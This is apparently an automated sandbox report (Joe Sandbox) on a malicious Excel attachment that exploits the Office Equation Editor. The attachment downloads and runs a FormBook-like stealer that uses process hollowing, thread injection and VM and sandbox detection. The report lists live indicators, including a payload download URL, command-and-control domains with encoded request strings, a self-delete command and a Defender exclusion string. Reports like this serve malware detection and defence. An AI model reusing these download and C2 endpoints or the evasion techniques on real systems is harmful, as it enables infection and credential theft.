          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: Letter 1019.xlsxStream path 'EncryptedPackage' entropy: 7.99984183654 (max. 8.0)

          Malware Analysis System Evasion:

          barindex
          Yara detected AntiVM3Show sources
          Source: Yara matchFile source: 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2792, type: MEMORY
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 00000000004085E4 second address: 00000000004085EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeRDTSC instruction interceptor: First address: 000000000040896E second address: 0000000000408974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 00000000000885E4 second address: 00000000000885EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\ipconfig.exeRDTSC instruction interceptor: First address: 000000000008896E second address: 0000000000088974 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc 5_2_004088A0
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2624Thread sleep time: -240000s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2920Thread sleep time: -103399s >= -30000sJump to behavior
          Source: C:\Users\Public\vbc.exe TID: 2952Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exe TID: 620Thread sleep time: -36000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\ipconfig.exeLast function: Thread delayed
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 103399Jump to behavior
          Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000006.00000000.2174423680.00000000001F5000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: vmware
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
          Source: explorer.exe, 00000006.00000000.2182851298.00000000041AD000.00000004.00000001.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: VMWARE
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
          Source: vbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
          Source: explorer.exe, 00000006.00000000.2197382188.0000000000231000.00000004.00000020.sdmpBinary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
          Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\Public\vbc.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\Public\vbc.exeCode function: 5_2_004088A0 rdtsc 5_2_004088A0
          Source: C:\Users\Public\vbc.exeCode function: 5_2_00409B10 LdrLoadDll,5_2_00409B10
          Source: C:\Users\Public\vbc.exeCode function: 5_2_007426F8 mov eax, dword ptr fs:[00000030h]5_2_007426F8
          Source: C:\Windows\SysWOW64\ipconfig.exeCode function: 7_2_022C26F8 mov eax, dword ptr fs:[00000030h]7_2_022C26F8
          Source: C:\Users\Public\vbc.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.myfavbutik.com
          Source: C:\Windows\explorer.exeDomain query: www.tricqr.com
          Source: C:\Windows\explorer.exeDomain query: www.buylocalclub.info
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.161.4 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.69-1hn7uc.net
          Source: C:\Windows\explorer.exeNetwork Connect: 163.43.122.104 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 99.83.154.118 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.defenestration.world
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\Public\vbc.exeMemory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5AJump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\Public\vbc.exeSection loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread register set: target process: 1388Jump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeThread register set: target process: 1388Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\Public\vbc.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\Public\vbc.exeSection unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 590000Jump to behavior
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
          Source: C:\Users\Public\vbc.exeProcess created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exeJump to behavior
          Source: C:\Windows\SysWOW64\ipconfig.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'Jump to behavior
          Source: explorer.exe, 00000006.00000000.2175046789.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000006.00000000.2175046789.00000000006F0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000006.00000000.2174423680.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000006.00000000.2175046789.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman
          Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformationJump to behavior
          Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000005.00000002.2208251364.0000000000530000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000000.2199605074.0000000002945000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377936853.00000000001D0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208195189.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377810691.0000000000080000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.2169946011.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.2377903647.00000000001A0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.2208158353.00000000003B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.2172726786.0000000003509000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.vbc.exe.35eb4f8.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.0.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.vbc.exe.400000.1.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsShared Modules1Path InterceptionProcess Injection612Masquerading111OS Credential DumpingSecurity Software Discovery321Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
          Default AccountsExploitation for Client Execution13Boot or Logon Initialization ScriptsExtra Window Memory Injection1Disable or Modify Tools1LSASS MemoryProcess Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion31Security Account ManagerVirtualization/Sandbox Evasion31SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection612NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol122SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsSystem Network Configuration Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonObfuscated Files or Information41Cached Domain CredentialsFile and Directory Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsSoftware Packing13DCSyncSystem Information Discovery113Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobExtra Window Memory Injection1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 signatures2 2 Behavior Graph ID: 432595 Sample: Letter 1019.xlsx Startdate: 10/06/2021 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->54 56 Found malware configuration 2->56 58 Malicious sample detected (through community Yara rule) 2->58 60 16 other signatures 2->60 10 EQNEDT32.EXE 12 2->10         started        15 EXCEL.EXE 38 33 2->15         started        process3 dnsIp4 44 18.140.1.169, 49165, 80 AMAZON-02US United States 10->44 32 C:\Users\user\AppData\Local\...\doc[1].exe, PE32 10->32 dropped 34 C:\Users\Public\vbc.exe, PE32 10->34 dropped 80 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->80 17 vbc.exe 10->17         started        36 C:\Users\user\Desktop\~$Letter 1019.xlsx, data 15->36 dropped file5 signatures6 process7 signatures8 46 Multi AV Scanner detection for dropped file 17->46 48 Machine Learning detection for dropped file 17->48 50 Tries to detect virtualization through RDTSC time measurements 17->50 52 Injects a PE file into a foreign processes 17->52 20 vbc.exe 17->20         started        process9 signatures10 62 Modifies the context of a thread in another process (thread injection) 20->62 64 Maps a DLL or memory area into another process 20->64 66 Sample uses process hollowing technique 20->66 68 Queues an APC in another process (thread injection) 20->68 23 explorer.exe 20->23 injected process11 dnsIp12 38 www.69-1hn7uc.net 163.43.122.104, 49167, 80 SAKURA-BSAKURAInternetIncJP Japan 23->38 40 www.myfavbutik.com 172.67.161.4, 49166, 80 CLOUDFLARENETUS United States 23->40 42 4 other IPs or domains 23->42 70 System process connects to network (likely due to code injection or exploit) 23->70 72 Uses ipconfig to lookup or modify the Windows network settings 23->72 27 ipconfig.exe 23->27         started        signatures13 process14 signatures15 74 Modifies the context of a thread in another process (thread injection) 27->74 76 Maps a DLL or memory area into another process 27->76 78 Tries to detect virtualization through RDTSC time measurements 27->78 30 cmd.exe 27->30         started        process16

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          Letter 1019.xlsx26%ReversingLabsDocument-OLE.Exploit.CVE-2018-0802

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\Public\vbc.exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe100%Joe Sandbox ML
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\doc[1].exe15%ReversingLabsByteCode-MSIL.Spyware.Negasteal
          C:\Users\Public\vbc.exe15%ReversingLabsByteCode-MSIL.Spyware.Negasteal

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          5.2.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          5.0.vbc.exe.400000.1.unpack100%AviraTR/Crypt.ZPACK.GenDownload File

          Domains

          SourceDetectionScannerLabelLink
          www.myfavbutik.com2%VirustotalBrowse
          www.69-1hn7uc.net1%VirustotalBrowse
          www.defenestration.world2%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          www.adultpeace.com/p2io/0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://www.icra.org/vocabulary/.0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://wellformedweb.org/CommentAPI/0%URL Reputationsafe
          http://www.69-1hn7uc.net/p2io/?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&1bPx7=ifrhEpc0Hv8pf40%Avira URL Cloudsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.iis.fhg.de/audioPA0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://www.%s.com0%URL Reputationsafe
          http://computername/printers/printername/.printer0%Avira URL Cloudsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://www.%s.comPA0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://%s.com0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://treyresearch.net0%URL Reputationsafe
          http://18.140.1.169/ggs/doc.exe100%Avira URL Cloudmalware
          http://www.myfavbutik.com/p2io/?9rx=dKp6rERGX1oMTEkAtHZ5ksFEU2G9ncFkpMVxqDe1xbP28bbT8N8SqGfKoZnot7fJ59eAsw==&1bPx7=ifrhEpc0Hv8pf4100%Avira URL Cloudmalware

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.myfavbutik.com
          		172.67.161.4
          		truetrueunknown
          www.69-1hn7uc.net
          		163.43.122.104
          		truetrueunknown
          www.defenestration.world
          		99.83.154.118
          		truetrueunknown
          www.tricqr.com
          		unknown
          		unknowntrue
            		unknown
            www.buylocalclub.info
            		unknown
            		unknowntrue
              		unknown

              Contacted URLs

              NameMaliciousAntivirus DetectionReputation
              www.adultpeace.com/p2io/true
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              		low
              http://www.69-1hn7uc.net/p2io/?9rx=V9Q6YNEpmTTku3594j8RVRt0udPCykKEN/raiLh+TizfOzW/z4mr+TojY495qvgWXqOzag==&1bPx7=ifrhEpc0Hv8pf4true
              • Avira URL Cloud: safe
              		unknown
              http://18.140.1.169/ggs/doc.exetrue
              • Avira URL Cloud: malware
              		unknown
              http://www.myfavbutik.com/p2io/?9rx=dKp6rERGX1oMTEkAtHZ5ksFEU2G9ncFkpMVxqDe1xbP28bbT8N8SqGfKoZnot7fJ59eAsw==&1bPx7=ifrhEpc0Hv8pf4true
              • Avira URL Cloud: malware
              		unknown

              URLs from Memory and Binaries

              NameSourceMaliciousAntivirus DetectionReputation
              http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkexplorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmpfalse
                		high
                http://www.windows.com/pctv.explorer.exe, 00000006.00000000.2181646383.0000000003C40000.00000002.00000001.sdmpfalse
                  		high
                  http://www.icra.org/vocabulary/.explorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.explorer.exe, 00000006.00000000.2175772627.0000000001C70000.00000002.00000001.sdmpfalse
                    		high
                    http://wellformedweb.org/CommentAPI/explorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    		unknown
                    http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000006.00000000.2182851298.00000000041AD000.00000004.00000001.sdmpfalse
                      		high
                      http://www.iis.fhg.de/audioPAexplorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.%s.comexplorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		low
                      http://www.piriform.com/ccleanerexplorer.exe, 00000006.00000000.2182851298.00000000041AD000.00000004.00000001.sdmpfalse
                        		high
                        http://computername/printers/printername/.printerexplorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmpfalse
                        • Avira URL Cloud: safe
                        		low
                        http://www.%s.comPAexplorer.exe, 00000006.00000000.2175772627.0000000001C70000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		low
                        http://%s.comexplorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		low
                        http://windowsmedia.com/redir/services.asp?WMPFriendly=trueexplorer.exe, 00000006.00000000.2181831950.0000000003E27000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://treyresearch.netexplorer.exe, 00000006.00000000.2183887794.0000000004B50000.00000002.00000001.sdmpfalse
                        • URL Reputation: safe
                        • URL Reputation: safe
                        • URL Reputation: safe
                        		unknown
                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2172296489.0000000002501000.00000004.00000001.sdmpfalse
                          		high
                          http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000006.00000000.2194134421.000000000A330000.00000008.00000001.sdmpfalse
                            		high
                            https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssvbc.exe, 00000004.00000002.2172328721.000000000252C000.00000004.00000001.sdmpfalse
                              		high

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              163.43.122.104
                              		www.69-1hn7uc.netJapan9370SAKURA-BSAKURAInternetIncJPtrue
                              99.83.154.118
                              		www.defenestration.worldUnited States
                              		16509AMAZON-02UStrue
                              18.140.1.169
                              		unknownUnited States
                              		16509AMAZON-02UStrue
                              172.67.161.4
                              		www.myfavbutik.comUnited States
                              		13335CLOUDFLARENETUStrue

                              Private

                              IP
                              192.168.2.255

                              General Information

                              Joe Sandbox Version:32.0.0 Black Diamond
                              Analysis ID:432595
                              Start date:10.06.2021
                              Start time:15:23:24
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 11m 56s
                              Hypervisor based Inspection enabled:false
                              Report type:full
                              Sample file name:Letter 1019.xlsx
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:10
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:1
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
